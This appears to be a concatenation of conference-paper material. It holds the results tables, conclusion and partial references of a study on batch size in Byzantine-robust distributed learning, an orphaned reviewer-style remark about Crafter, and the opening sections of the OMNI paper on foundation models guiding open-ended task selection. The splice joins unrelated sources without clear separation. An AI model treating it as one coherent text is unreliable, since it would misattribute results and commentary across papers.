| 64×8 | 91.50% (-0.52%) | 87.92% (+4.11%) | 70.88% (+7.77%) |
| 128×8 | 90.85% (-1.17%) | **89.68%** (+5.87%) | 82.08% (+18.97%) |
| 256×8 | 89.26% (-2.76%) | 87.99% (+4.18%) | **87.62%** (+24.51%) |
| 512×8 | 88.21% (-3.81%) | 87.70% (+3.89%) | 86.95% (+23.84%) |
| 1024×8 | 86.52% (-5.50%) | 85.94% (+2.13%) | 84.75% (+21.64%) |

Table 2: The final top-1 test accuracy of ByzSGDm with various batch sizes under the ALIE attack when coordinate-wise median (CM) and centered clipping (CC) are used as the robust aggregator

ByzSGDm with CM:

| Batch size | \(\delta = 0\) | \(\delta = 1/8\) | \(\delta = 3/8\) |
|------------|----------------|------------------|------------------|
| 32×8 (baseline) | 92.30% | 86.46% | 33.11% |
| 64×8 | 91.79% (-0.51%) | 88.09% (+1.63%) | 55.66% (+22.55%) |
| 128×8 | 90.43% (-1.87%) | 89.16% (+2.70%) | 66.38% (+33.27%) |
| 256×8 | 89.84% (-2.46%) | 88.60% (+2.14%) | 82.47% (+49.36%) |
| 512×8 | 87.27% (-5.03%) | 87.20% (+0.74%) | 83.25% (+50.14%) |
| 1024×8 | 84.06% (-8.24%) | 83.71% (-2.75%) | 80.94% (+47.83%) |

Table 3: The final top-1 test accuracy when there are 3 Byzantine workers under the ALIE attack

| Method | with KR | with GM | with CM | with CC |
|---------------------------------|---------|---------|---------|---------|
| ByzSGDm, batch size = 32 × 8 | 38.55% | 63.11% | 33.11% | 72.83% |
| ByzSGDnm, batch size = 32 × 8 | 43.47% | 69.45% | 61.28% | 78.50% |
| ByzSGDm, batch size = 512 × 8 | 83.42% | 86.95% | 83.25% | 87.46% |
| ByzSGDnm, batch size = 512 × 8 | 85.12% | 89.13% | 86.03% | 88.53% |

Table 4: The final top-1 test accuracy when there are 3 Byzantine workers under the FoE attack

| Method | with KR | with GM | with CM | with CC |
|---------------------------------|---------|---------|---------|---------|
| ByzSGDm, batch size = 32 × 8 | 10.00% | 78.36% | 83.97% | 83.60% |
| ByzSGDnm, batch size = 32 × 8 | 10.00% | 88.55% | 84.12% | 88.99% |
| ByzSGDm, batch size = 512 × 8 | 10.00% | 84.09% | 79.16% | 86.24% |
| ByzSGDnm, batch size = 512 × 8 | 10.00% | 89.12% | 84.65% | 89.32% |

**Effectiveness of large batch size and momentum normalization.** In this paper, we propose to use (i) a relatively large batch size and (ii) the momentum normalization technique. Here, we empirically evaluate the effectiveness of these two improvements. Specifically, we compare the performance of the following four methods: (a) ByzSGDm with batch size \(32 \times 8\) (baseline), (b) ByzSGDnm with batch size \(32 \times 8\), (c) ByzSGDm with batch size \(512 \times 8\), and (d) ByzSGDnm with batch size \(512 \times 8\).
The performances of the methods are compared when there are 3 Byzantine workers under ALIE attack (Baruch et al., 2019) and FoE attack (Xie et al., 2020), respectively. As presented in Table 3 and Table 4, among the four methods, ByzSGDnm with batch size $512 \times 8$ has the best top-1 test accuracy except for the case of using aggregator KR under FoE attack. All the methods fail when using KR under FoE attack, mainly because the KR aggregator is not robust against the FoE attack, as shown in existing works (Karimireddy et al., 2021; Xie et al., 2020). The empirical results of ByzSGDm and ByzSGDnm with more batch sizes are deferred to Appendix E to save space. In addition, we also compare the performance of ByzSGDm and ByzSGDnm under no attack (or failure) and under bit-flipping failure (Xie et al., 2019), respectively. ByzSGDnm has a comparable performance to ByzSGDm in these two cases. Please refer to Appendix E for the detailed results.

More evaluation when NNM is used. We also compare the empirical performance of different methods when the nearest neighbour mixing (NNM) (Allouah et al., 2023) technique is used. NNM is originally proposed to enhance the robustness of aggregators in general non-i.i.d. cases but can also be used in i.i.d. cases. As the results in Table 5 show, ByzSGDnm with batch size 512 × 8 still has the best final top-1 test accuracy under ALIE attacks when NNM is used. In addition, we find it interesting that when combined with NNM, the performance of KR and CM is improved, but the performance of GM and CC is degraded. Since NNM is originally proposed for general non-i.i.d. cases, it requires further study to understand this behavior of NNM in i.i.d. cases. However, since we mainly focus on the effect of batch size, this is beyond the scope of this work.

Table 5: The final top-1 test accuracy when there are 3 Byzantine workers under ALIE attack and the nearest neighbour mixing (NNM) technique is used

| Method | with KR | with GM | with CM | with CC |
|---------------------------------------------|---------|---------|---------|---------|
| ByzSGDm, batch size = 32 × 8 (baseline) | 58.61% | 72.58% | 71.51% | 76.48% |
| ByzSGDnm, batch size = 32 × 8 | 80.41% | 79.50% | 79.81% | 79.91% |
| ByzSGDm, batch size = 512 × 8 | 85.26% | 85.37% | 86.95% | 85.98% |
| ByzSGDnm, batch size = 512 × 8 | 87.68% | 88.09% | 87.69% | 87.59% |

Table 6: The wall-clock time of ByzSGDm and ByzSGDnm for 160 epochs (in seconds)

| Batch size | 32×8 | 64×8 | 128×8 | 256×8 | 512×8 |
|------------|------|------|-------|-------|-------|
| ByzSGDm | 2007.39s | 985.52s (×2.04 faster) | 522.27s (×3.84 faster) | 366.98s (×5.47 faster) | 314.80s (×6.38 faster) |
| ByzSGDnm | 1985.78s | 978.50s (×2.03 faster) | 515.46s (×3.85 faster) | 376.70s (×5.27 faster) | 327.62s (×6.06 faster) |

The bonus of training acceleration. Existing works (Goyal et al., 2017; Hoffer et al., 2017; Keskar et al., 2017; You et al., 2020; Zhao et al., 2020, 2023) have shown that increasing the batch size can accelerate the training process by reducing the communication cost and utilizing the computing power of GPUs more effectively. We present the wall-clock time for 160 epochs when using CC as the robust aggregator under no attack in Table 6. Please note that whether there are attacks or not has almost no effect on the computation cost of non-Byzantine workers. For both ByzSGDm and ByzSGDnm, the running time decreases as the batch size increases.
This verifies that increasing the batch size brings the bonus of training acceleration. In addition, ByzSGDnm has a comparable running time to ByzSGDm, which shows that the computation cost of the momentum normalization is negligible.

Comparison with Byz-VR-MARINA. Byz-VR-MARINA (Gorbunov et al., 2023) is originally proposed for non-i.i.d. cases, but can also be used in i.i.d. cases. Therefore, we also empirically compare ByzSGDnm with Byz-VR-MARINA. Empirical results show that ByzSGDnm significantly outperforms Byz-VR-MARINA in i.i.d. cases. Detailed results are deferred to Appendix D. Although we mainly study the effect of batch size in BRDL for i.i.d. cases in this work, we also provide some empirical results under non-i.i.d. settings in Appendix E.2. The empirical results show that ByzSGDnm still outperforms existing methods in the non-i.i.d. setting. However, further work is required to investigate in detail the effect of batch size and the behavior of ByzSGDnm in non-i.i.d. cases, which we leave for future study.

6 CONCLUSION

In this paper, we theoretically show that when the total number of gradient computations is fixed, the optimal batch size corresponding to the tightest theoretical upper bound in BRDL increases with the fraction of Byzantine workers. The theoretical results indicate that a relatively large batch size is preferred when there are Byzantine attacks. Furthermore, we propose a novel method called ByzSGDnm and prove the convergence of ByzSGDnm. Empirical results show that under Byzantine attacks, setting a relatively large batch size can significantly increase model accuracy compared to using a small batch size, which is consistent with our theoretical results. Moreover, ByzSGDnm can achieve higher model accuracy than existing BRDL methods when under attack. In addition, increasing the batch size brings the bonus of training acceleration, which is verified by the empirical results.

REPRODUCIBILITY STATEMENT

For the theoretical results of our work, the assumptions are presented in Section 2 and the detailed proofs are deferred to Appendix B. For the empirical results, the experimental platform and the hyper-parameter settings are described in Section 5. The core code for our experiments can be found in the supplementary material.

ACKNOWLEDGMENTS

This work is supported by National Key R&D Program of China (No. 2020YFA0713900), NSFC Project (No. 12326615, No. 62192783), and Fundamental Research Funds for the Central Universities (No. 020214380108).

REFERENCES

Dan Alistarh, Demjan Grubic, Jerry Li, Ryota Tomioka, and Milan Vojnovic. QSGD: Communication-efficient SGD via gradient quantization and encoding. In Advances in Neural Information Processing Systems, pp. 1709–1720, 2017.

Zeyuan Allen-Zhu, Faeze Ebrahimian, Jerry Li, and Dan Alistarh. Byzantine-resilient non-convex stochastic gradient descent. arXiv preprint arXiv:2012.14368, 2020.

Youssef Allouah, Sadegh Farhadkhani, Rachid Guerraoui, Nirupam Gupta, Rafaël Pinot, and John Stephan. Fixing by mixing: A recipe for optimal Byzantine ML under heterogeneity. In Proceedings of the International Conference on Artificial Intelligence and Statistics, pp. 1232–1300. PMLR, 2023.

Yossi Arjevani, Yair Carmon, John C Duchi, Dylan J Foster, Nathan Srebro, and Blake Woodworth. Lower bounds for non-convex stochastic optimization. Mathematical Programming, 199(1-2):165–214, 2023.

Gilad Baruch, Moran Baruch, and Yoav Goldberg. A little is enough: Circumventing defenses for distributed learning.
In Advances in Neural Information Processing Systems, pp. 8635–8645, 2019.

Jeremy Bernstein, Jiawei Zhao, Kamyar Azizzadenesheli, and Anima Anandkumar. signSGD with majority vote is communication efficient and fault tolerant. In Proceedings of the International Conference on Learning Representations, 2019.

Peva Blanchard, Rachid Guerraoui, Julien Stainer, et al. Machine learning with adversaries: Byzantine tolerant gradient descent. In Advances in Neural Information Processing Systems, pp. 119–129, 2017.

Saikiran Bulusu, Prashant Khanduri, Swatantra Kafle, Pranay Sharma, and Pramod K Varshney. Byzantine resilient non-convex SCSG with distributed batch gradient computations. IEEE Transactions on Signal and Information Processing over Networks, 7:754–766, 2021.

Lingjiao Chen, Hongyi Wang, Zachary Charles, and Dimitris Papailiopoulos. Draco: Byzantine-resilient distributed training via redundant gradients. In Proceedings of the International Conference on Machine Learning, pp. 903–912, 2018.

Yudong Chen, Lili Su, and Jiaming Xu. Distributed statistical machine learning in adversarial settings: Byzantine gradient descent. Proceedings of the ACM on Measurement and Analysis of Computing Systems, 1(2):1–25, 2017.

Ashok Cutkosky and Harsh Mehta. Momentum improves normalized SGD. In Proceedings of the International Conference on Machine Learning, pp. 2260–2268, 2020.

Georgios Damaskinos, Rachid Guerraoui, Rhicheek Patra, Mahsa Taziki, et al. Asynchronous Byzantine machine learning (the case of SGD). In Proceedings of the International Conference on Machine Learning, pp. 1145–1154, 2018.

Aaron Defazio and Léon Bottou. On the ineffectiveness of variance reduced optimization for deep learning. Advances in Neural Information Processing Systems, 32, 2019.
AgM3MzT99c
This is quite important in a practical open-ended environment. Without considering the survival component, the aspects that need to be considered when choosing the task become less adequate and complex, which goes against the motivation of using LLMs here.
OMNI: Open-endedness via Models of Human Notions of Interestingness

Jenny Zhang^{1,2}, Joel Lehman^{3}, Kenneth Stanley^{4}, Jeff Clune^{1,2,5}

^{1}Department of Computer Science, University of British Columbia ^{2}Vector Institute ^{3}Stochastic Labs ^{4}Maven ^{5}Canada CIFAR AI Chair

Abstract

Open-ended algorithms aim to learn new, interesting behaviors forever. That requires a vast environment search space, but there are thus infinitely many possible tasks. Even after filtering for tasks the current agent can learn (i.e., learning progress), countless learnable yet uninteresting tasks remain (e.g., minor variations of previously learned tasks). An Achilles Heel of open-endedness research is the inability to quantify (and thus prioritize) tasks that are not just learnable, but also interesting (e.g., worthwhile and novel). We propose solving this problem by Open-endedness via Models of human Notions of Interestingness (OMNI). The insight is that we can utilize foundation models (FMs) as a model of interestingness (MoI), because they already internalize human concepts of interestingness from training on vast amounts of human-generated data, where humans naturally write about what they find interesting or boring. We show that FM-based MoIs improve open-ended learning by focusing on tasks that are both learnable and interesting, outperforming baselines based on uniform task sampling or learning progress alone. This approach has the potential to dramatically advance the ability to intelligently select which tasks to focus on next (i.e., auto-curricula), and could be seen as AI selecting its own next task to learn, facilitating self-improving AI and AI-Generating Algorithms.

1 INTRODUCTION

Provided that the real, significant challenges of AI safety and existential risk can be solved (Critch & Krueger, 2020; Bostrom, 2002; Turchin & Denkenberger, 2020; Ecoffet et al., 2020), there are tremendous gains to be had by creating more powerful AI or even AGI. A great hope for AI is that one day it can produce breakthroughs that fundamentally improve the human condition. These so-far uniquely human advancements and discoveries are the hallmark of civilization, from the invention of the wheel, to farming, vaccines, computers, and even rock and roll. Perhaps someday, AI could achieve such major breakthroughs automatically. What does AI need to possess to discover such new paradigms, as only humans have until now? Much discussed in open-endedness research (Stanley et al., 2023), the ephemeral fuel behind civilization's prodigious output is the human intuition for interestingness. Drawing upon eons of human experience, we can sense potential even when we don't precisely know where it leads. Conventional Reinforcement Learning (RL) tools (e.g., intrinsic motivation (Aubret et al., 2019; Pathak et al., 2017; Osband et al., 2018; Colas et al., 2022; Oudeyer et al., 2007) and learning progress (Kanitscheider et al., 2021; Matiisen et al., 2019; Portelas et al., 2020; Graves et al., 2017; Kovač et al., 2022; Baranes & Oudeyer, 2013)) are so far only shadows of what such a human sense could do. However, with the rise of foundation models (FMs) (Bommasani et al., 2021), such as large language models (Radford et al., 2018),
an intriguing prospect has arisen: trained on vast troves of human experience, perhaps FMs have the potential to grapple for the first time with the critical question of what is actually interesting to explore.¹

¹We recommend the version on arXiv (https://arxiv.org/abs/2306.01711), which is slightly longer and thus able to explain things more clearly and more fully discuss the implications of this work. Project website: https://www.jennyzhangzt.com/omni/

Open-ended learning algorithms, which could leverage such a notion of interestingness, seek to create AI agents that, like humans, continuously learn a variety of different skills within a vast, complex, ever-changing environment. The challenge addressed by interestingness is that, in such environments, there are an infinite number of possible tasks, requiring some method to choose which tasks to try to learn next at every point in training. Handcrafting curricula for training agents in open-ended environments can be extremely challenging due to the sheer number of tasks and the need to adapt to the agent's skill level and learning progress. In pursuit of an algorithm that is applicable in any domain and enables perpetual learning, handcrafting curricula proves to be an impractical solution.

Learning progress methods are a type of auto-curriculum approach that estimates which tasks are at appropriate difficulty levels for the agent to learn from (Kanitscheider et al., 2021; Matiisen et al., 2019; Portelas et al., 2020; Graves et al., 2017; Kovač et al., 2022; Baranes & Oudeyer, 2013). However, such methods can be distracted by learnable yet uninteresting tasks. For example, an agent could be bogged down indefinitely with rearranging silverware in slightly new configurations, hindering it from trying other interesting tasks. Even after filtering for tasks that the current agent can learn, countless learnable yet uninteresting tasks may persist (e.g., slight variations of previously learned tasks). A key challenge in open-endedness research is the inability to quantify and thus focus on tasks that are not only learnable but also interesting. There have been many attempts to quantify interestingness, but, as we detail in Section 2, such simple, hand-crafted formulas consistently fall short of truly capturing the essence of interestingness, creating crippling pathologies.

This paper proposes a different path forward. To borrow from Newton, modern AI sees further by standing on the shoulders of giant human datasets. Training on vast amounts of human-generated data has proven powerful in many cases, such as text generation (e.g., GPT-3 (Brown et al., 2020)), image generation (e.g., DALL-E (Ramesh et al., 2021)), and representation learning (e.g., CLIP (Radford et al., 2021)). We propose Open-endedness via Models of human Notions of Interestingness (OMNI). OMNI leverages the power of FMs that have already been trained on extensive human-generated data and have an inherent understanding of human notions of interestingness (Brown et al., 2020; OpenAI, 2023). OMNI utilizes FMs as a model of interestingness (MoI) to focus on tasks that are: (1) learnable, at appropriate difficulty levels for the agents to learn from, and (2) interesting, roughly meaning worthwhile to learn and sufficiently novel. The concepts of "interestingness", "worthwhile", and "novelty" are challenging to explicitly define, let alone quantify, which is precisely what OMNI addresses.
Humans can intuitively assess these qualities despite their elusive and abstract nature, echoing Justice Potter Stewart's sentiment of "I know it when I see it" (Stewart, 1964). The goal of OMNI is to emulate this human capacity for nuanced interestingness judgement in open-ended learning. We evaluate OMNI on three challenging domains, Crafter (Hafner, 2021) (a 2D version of Minecraft), BabyAI (Chevalier-Boisvert et al., 2018) (a 2D grid world for grounded language learning), and AI2-THOR (Kolve et al., 2017) (a 3D photo-realistic embodied robotics environment). OMNI outperforms baselines based on uniform task sampling or learning progress alone. Overall, OMNI has the potential to significantly enhance the ability of AI to intelligently select which tasks to concentrate on next for endless learning and marks a step towards self-improving AI and AI-Generating Algorithms (Clune, 2019).

2 RELATED WORK

2.1 AUTO-CURRICULUM LEARNING

Training neural networks with a curriculum has been extensively studied (Bengio et al., 2009). Auto-curriculum learning has emerged as a promising research area in RL (Kanitscheider et al., 2021; Matiisen et al., 2019; Portelas et al., 2020; Graves et al., 2017; Kovač et al., 2022; Baranes & Oudeyer, 2013; Lehman & Stanley, 2011a; Eysenbach et al., 2018; Wang et al., 2019, 2020; Akkaya et al., 2019; Florensa et al., 2018; Zhang et al., 2020; Campero et al., 2020; OpenAI et al., 2021; Dennis et al., 2020; Gur et al., 2021; Jiang et al., 2021; Dharna et al., 2022), with approaches based on success probabilities and reward thresholds (Wang et al., 2019, 2020; Akkaya et al., 2019; Campero et al., 2020; Tan et al., 2023), regret (Dennis et al., 2020; Gur et al., 2021; Jiang et al., 2021), or learning progress (Kanitscheider et al., 2021; Matiisen et al., 2019; Portelas et al., 2020; Graves et al., 2017; Kovač et al., 2022; Baranes & Oudeyer, 2013).

Static threshold-based approaches provide a straightforward method for curriculum design. These approaches involve setting fixed criteria for tasks based on their difficulty or complexity. An agent progresses to the subsequent task in a predefined order only after mastering a simpler one. To handcraft an effective curriculum, one would have to understand the relative difficulty of each task and identify tasks of suitable difficulty corresponding to each phase of the agent's learning trajectory. Doing this in a vast task space is extremely difficult or even impossible.

Regret-based methods compute per-task regret by taking the difference between the maximum known return and the average return over multiple rollouts. Regret-based methods typically select tasks with high regret, under the assumption that these tasks still offer substantial learning opportunities (Dennis et al., 2020; Gur et al., 2021; Jiang et al., 2021). However, in stochastic environments, this approach may favor more stochastic and less learnable tasks instead of less stochastic and more learnable ones (Kanitscheider et al., 2021).

Learning-progress-based curricula have the potential to mitigate these issues by monitoring the agent's progress and adapting the task selection accordingly (Kanitscheider et al., 2021; Matiisen et al., 2019; Portelas et al., 2020; Graves et al., 2017; Kovač et al., 2022; Baranes & Oudeyer, 2013). Kanitscheider et al. (2021) demonstrated that learning progress can be measured reliably and that learning-progress-based curricula can be applied to hard RL problems at scale.
Our work extends the learning-progress-based curriculum proposed by Kanitscheider et al. (2021). A notable limitation of existing auto-curricula approaches is their inability to distinguish between interesting and uninteresting tasks. Despite filtering for learnable tasks, open-ended environments may still contain infinite learnable but uninteresting tasks. This paper proposes a novel method for identifying and filtering interesting tasks and integrates it with a learning-progress-based auto-curriculum.

2.2 ATTEMPTS TO QUANTIFY INTERESTINGNESS

Many prior research papers have tried to encourage a predefined metric of novelty, diversity, exploration, or open-endedness, but doing so requires quantifying these ineffable qualities. The problem is that optimizing these quantitative measures often leads to undesirable or pathological outcomes, resulting in an output that conforms to the defined metrics, rather than achieving the intended goal (Aubret et al., 2019; Pathak et al., 2017; Osband et al., 2018; Colas et al., 2022; Oudeyer et al., 2007; Etcheverry et al., 2020; Lehman & Stanley, 2011a; Mouret, 2011; Mouret & Clune, 2015; Lehman & Stanley, 2011b; Eysenbach et al., 2018; Bellemare et al., 2016; Ecoffet et al., 2019; Mendonca et al., 2023; Lehman & Stanley, 2012; Lehman et al., 2020; Nguyen et al., 2015; Auerbach & Bongard, 2010; Zhou et al., 2023; Cai et al., 2023). As Goodhart's law posits, "when a measure becomes a target, it ceases to be a good measure" (Strathern, 1997). For example, an agent might exploit a novelty measure by generating many superficially different but ultimately trivial solutions, thus undermining the goal of discovering genuinely interesting outcomes (Lehman & Stanley, 2011a). Similarly, based on how intrinsic motivation is measured, an agent could be biased towards certain types of solutions, leading to a narrow exploration of the problem space rather than developing diverse and valuable insights and innovations (Aubret et al., 2019). Attempting to manually specify a criterion for what constitutes an interesting learning challenge is unlikely to yield satisfactory results. Instead, this paper proposes harnessing FMs to model ineffable human notions of interestingness, gleaned from large text corpora of existing human-generated data (e.g., training on the Internet).

2.3 PRE-TRAINED FOUNDATION MODELS IN OPEN-ENDEDNESS

Large language models have recently shown a remarkable ability to capture rich knowledge on an extensive array of subjects from large-scale text corpora. They achieve impressive performance across a wide range of natural language processing tasks (Brown et al., 2020; OpenAI, 2023; Kenton & Toutanova, 2019; Liu et al., 2019; Min et al., 2021; Li et al., 2022; Colas et al., 2023) and display profound understanding of complex concepts such as physics. Consequently, they are utilized in many robotics domains (Huang et al., 2022b; Ahn et al., 2022; Yang et al., 2023; Lynch & Sermanet, 2020; Sharma et al., 2021; Kant et al., 2022; Kwon et al., 2023; Du et al., 2023; Driess et al., 2023). There has been growing interest in using them for task selection or generation.
Some studies have investigated the application of FMs in breaking down high-level instructions into a sequence of sub-goals, which can be executed by an agent in a zero-shot manner (Huang et al., 2022b; Ahn et al., 2022; Yang et al., 2023; Colas et al., 2023; Zhu et al., 2023) or used to train modular sub-policies (Lynch & Sermanet, 2020; Sharma et al., 2021). Kant et al. (2022) query FMs for zero-shot commonsense priors and apply them to a planning task. Other studies have utilized FMs to estimate success rates for a given task or desired behavior (Kwon et al., 2023; Du et al., 2023; Colas et al., 2023; Wang et al., 2023a,b). Moreover, FMs have been employed to generate or explain tasks, enabling structured exploration in various environments (Du et al., 2023; Colas et al., 2023; Wang et al., 2023a,b; Yuan et al., 2023). OMNI differs from Du et al. (2023) by considering an agent's past successes and employing FMs' commonsense knowledge for adaptive task selection. Unlike Wang et al. (2023a), which employs a code API generated by FMs, OMNI promotes direct action learning via environment interaction, demanding potentially higher computational resources but bypassing the need for and, critically, limitations of, domain-specific code APIs. While Colas et al. (2023) use deterministic environments and binary reward signals for trajectory success, OMNI adopts a more nuanced approach in stochastic settings, recognizing that agents often improve over time and may not always achieve consistent success rates.

3 METHODS

3.1 PROBLEM FORMULATION

We train task-conditioned agents, and formulate the RL problem as a partially observed Markov decision process (Kaelbling et al., 1998) defined by a tuple \((S, A, T, R, O, \Omega, \gamma)\). Observations \(o \in \Omega\) depend on the new environment states \(s \in S\) and actions taken \(a \in A\) via \(O(o|s, a)\). The task which the agent is conditioned on is part of the environment state \(s\). \(T(s'|s, a)\) describes the dynamics of the environment. \(R(s, a)\) is the environment's reward function. \(\gamma\) is a discount factor. OMNI focuses on generating learnable and interesting tasks to condition the RL agent on.

3.2 LEARNING PROGRESS CURRICULUM

The task pool in open-ended environments can be very large and diverse, making it challenging for an agent to learn effectively through uniform sampling. Most randomly sampled tasks are likely to be impossible (or at least currently too hard for the agent to learn). To automatically identify tasks at the frontier of the agent's capabilities, we extend the learning-progress-based curriculum (without the dynamic exploration bonus) from Kanitscheider et al. (2021). The curriculum predominantly samples tasks with high learning progress, defined as an agent's recent change in task success probability. During training, the agent is periodically evaluated, and a recent success probability estimate \(p_{\text{recent}}\) is calculated by applying an exponential moving average (EMA) to the evaluated task success rates. \(p_{\text{recent}}\) is smoothed with a second, identical EMA to obtain a slower-to-change reflection \(p_{\text{gradual}}\) of the success probability. Since tasks with low success probabilities are more likely to be novel and are harder to learn because the agent observes fewer successes, \(p_{\text{recent}}\) and \(p_{\text{gradual}}\) are reweighted to magnify the learning progress in tasks with low success probabilities and reduce the learning progress in tasks with high success probabilities.
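As a minimal sketch of this curriculum, the code below tracks the two EMAs and computes bidirectional learning progress. The EMA coefficient and the exact reweighting function are illustrative assumptions; the precise forms follow Kanitscheider et al. (2021) and may differ from what is shown here.

```python
import numpy as np

def reweight(p: np.ndarray, theta: float = 0.1) -> np.ndarray:
    # Hypothetical reweighting that magnifies changes at low success
    # probabilities and damps them at high ones; the exact form in
    # Kanitscheider et al. (2021) may differ.
    return p / (p + theta * (1.0 - p))

class LearningProgress:
    def __init__(self, num_tasks: int, alpha: float = 0.1):
        self.alpha = alpha
        self.p_recent = np.zeros(num_tasks)   # fast EMA of evaluated success rates
        self.p_gradual = np.zeros(num_tasks)  # second, identical EMA of p_recent

    def update(self, success_rates: np.ndarray) -> None:
        self.p_recent += self.alpha * (success_rates - self.p_recent)
        self.p_gradual += self.alpha * (self.p_recent - self.p_gradual)

    def bidirectional_lp(self) -> np.ndarray:
        # The absolute difference captures both improvement and forgetting.
        return np.abs(reweight(self.p_recent) - reweight(self.p_gradual))
```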
This reweighting also compensates for the temporal delay caused by the EMA (Figure 4). Bidirectional learning progress, the absolute difference between the reweighted \(p_{\text{recent}}\) and \(p_{\text{gradual}}\), is used to also focus learning on tasks where performance is degrading due to forgetting. Sampling of training tasks is biased towards those that score the highest on this bidirectional learning progress measure. We propose an extension to the approach from Kanitscheider et al. (2021), normalizing the task success rates with the success rates achieved by a random action policy (Appendix A).

3.3 MODELING WHAT HUMANS FIND INTERESTING

An LP curriculum can be distracted by endless variations of uninteresting tasks. To address this challenge, a Model of Interestingness (MoI) selects interesting tasks that offer substantial learning value. Humans often intuitively know what might be useful for learning new skills or achieving goals much later (Stanley & Lehman, 2015). This is evident in children playing to unknowingly acquire skills, or scientists exploring new areas to uncover unexpected and beneficial knowledge for future endeavors. This paper presents two (of many possible) instances of the OMNI principle: one in finite task spaces (Section 3.3), and one in an infinite task space (Section 5.1). This section describes the former, first outlining the process of using an FM to determine which tasks are interesting, and then describing how the interestingness predictions are utilized to obtain task sampling weights.

Determining Interesting Tasks. This paper capitalizes on the capabilities of autoregressive FMs to emulate human notions of interestingness. FMs are pretrained on vast and diverse text corpora, enabling them to amass a significant amount of world knowledge. We prompt the FM in a few-shot manner by providing it with examples of choosing which tasks are interesting. It takes into account the agent's existing proficiency on a given set of tasks and suggests what humans would typically find interesting to learn next. Davinci GPT-3 (Brown et al., 2020) was utilized for the Crafter experiments because it was the state-of-the-art language model available when the experiments were run. GPT-4 (OpenAI, 2023) was used for the BabyAI experiments, which were conducted later. Appendices B and C show the full prompts.

Sampling Weights. OMNI aims to improve open-ended learning by focusing on tasks that are both learnable and interesting (Figure 4). The full OMNI algorithm is summarized in Algorithm 1. Task sampling rates are first assigned based on the LP curriculum, with higher rates for tasks with higher learning progress (Section 3.2). Then, an FM-based MoI predicts which tasks are interesting (Appendix I). Boring tasks have their sampling weights reduced by multiplying by 0.001. Finally, task sampling rates are normalized to probabilities that sum to 1.

4 EXPERIMENTS IN A FINITE TASK SPACE

Figure 1: Crafter and BabyAI environments. (Left) Agent view in a procedurally generated Crafter world, showing terrain types, resources, and the agent's inventory. (Middle) The 15 tasks considered interesting for Crafter analyses. Arrows indicate which tasks in the technology tree must be completed, often multiple times, along the way to perform more challenging tasks. (Right) Bird's-eye view of a randomly generated BabyAI environment, showing different object types, colors, locations, and states. The agent is the red triangle and its view (sometimes occluded) is highlighted in light grey.
In this example, the agent starts from the bottom right room, and is tasked to "go to a red ball". To succeed, the agent must open the green door (sometimes locked) to reach the red ball.

4.1 CRAFTER ENVIRONMENT

We evaluate OMNI on Crafter (Hafner, 2021), a 2D version of Minecraft that enables collecting and creating a set of artifacts organized along a technology tree. This means that certain tasks need to be completed, often multiple times, as prerequisites for other more challenging tasks (Figure 1). Agents receive RGB pixel observations (64 x 64 resolution) of a 9 x 9 grid area surrounding their position within a 64 x 64 grid landscape that varies with each episode, offering a complex and engaging testing ground. The agent is provided a target task (represented with a bag-of-words encoding) as part of its observation and rewarded +1 upon successful completion of the conditioned task. We modify the game to focus on gathering and crafting skills by eliminating the survival component. This removes the need for the agent to learn and continually apply survival tactics against enemies or for food gathering. The "sleep" and "place plant" actions are important for survival in the original game and have been omitted due to their reduced relevance in our modified context, which excludes the survival aspect. The original game consists of 22 tasks, of which the 15 tasks unrelated to survival are selected and considered interesting.

To investigate our hypothesis that focusing on interesting tasks with high learning progress will improve performance, we dilute the 15 interesting tasks with 90 "boring" tasks and 1023 "extremely challenging" tasks that serve as potential distractors for learning-progress-based approaches. Boring tasks are generated as numerical repeats of interesting tasks, e.g., "collect N wood" where $N \in [2, 10]$, analogous to how minor numerical variations of real-world tasks are less interesting than tasks that differ qualitatively. See Appendix K for the full list of boring tasks. Extremely challenging tasks represent tasks that are too difficult for the agent to complete at its current state of learning, serving as tasks that uniform sampling will waste time on, but that learning-progress-based methods should successfully ignore. The agent is assumed to always fail at these extremely challenging tasks and hence is always assigned a success rate of 0 for them. By analogy, consider the futility of attempting to cook a 5-course meal before learning the basic skill of cutting a vegetable.

4.2 BABYAI ENVIRONMENT

We also evaluate OMNI on BabyAI (Chevalier-Boisvert et al., 2018), a readily available benchmark domain characterized by its partially observable 2D grid world environment (Figure 1). We test on the MiniBossLevel. While BossLevel is the most challenging level in BabyAI, we choose MiniBossLevel as it has the same features as BossLevel but with a smaller room and lower probability of locked rooms, speeding up training. For each episode, the room layout and item configuration are randomly generated (using off-the-shelf configurations from Chevalier-Boisvert et al. (2018)). The grid world can have objects in six colors (red, green, blue, purple, yellow, grey), and of four types (key, ball, box, door). The agent is randomly spawned at a location in the 9 x 9 grid world, containing four 3 x 3 rooms.
The agent's observation includes one-hot encodings of each of the 7 x 7 grid cells in front of the agent (observations are set to a special symbol if occluded), and a description of the task in natural language (embedded with a look-up table and GRU, see Appendix M for more details). The agent receives a reward, proportional to the number of steps it took to finish, only when it has successfully completed the given task. While the Baby Language grammar (Chevalier-Boisvert et al., 2018) is limited to sequential tasks with a maximum of 2 instructions, we expanded this by permitting tasks with up to 5 instructions, resulting in 1364 unique tasks. Each task is a sequence of instructions (GoTo, PickUp, OpenDoor, PutNextTo), linked by the ordering constraint then. Object placements are randomized each episode. Tasks with the same sequence of instructions but different object instances are considered the same when sampling (e.g., "go to a blue ball" and "go to a red key" are considered the same task "go to <object>").

4.3 RESULTS

Figure 2: Results in Crafter. (Left) Conditional success probabilities of all tasks in Crafter. Tasks are organized from simple to complex based on the prerequisite tasks that must be accomplished before completing the target task. Task names (left of each row) are readable in a digital format with zoom. (Right) Performance in Crafter on all tasks. While OMNI biases training towards interesting tasks, it achieves higher average task success rates and learns more tasks than uniform sampling or choosing tasks based on learning progress alone, even across all tasks.

Both Crafter and BabyAI RL agents are trained with PPO (Schulman et al., 2017), a standard RL algorithm. Policy details and hyperparameters for the Crafter and BabyAI settings are in Appendices L and M. We compare the performance of agents trained with: (1) Uniform sampling, (2) Learning Progress (LP) only, and (3) OMNI: Learning Progress with additional filtering by a Model of Interestingness (OMNI: LP + MoI). Uniform sampling, the control, samples all tasks with equal probabilities. Uniform sampling is the most naive and samples tasks that are too easy or too difficult for the agent most of the time. LP samples tasks based on the calculated learning progress weights (Section 3.2), but is distracted by the many boring tasks. OMNI: LP + MoI focuses on the subset of tasks with high learning progress that are also interesting (Section 3.3). All experiments are run for 100 million time steps and are repeated 10 times with different random seeds. Each experiment takes about 33 hrs for Crafter and 60 hrs for BabyAI on a 24GB NVIDIA A10 GPU with 30 virtual CPUs.

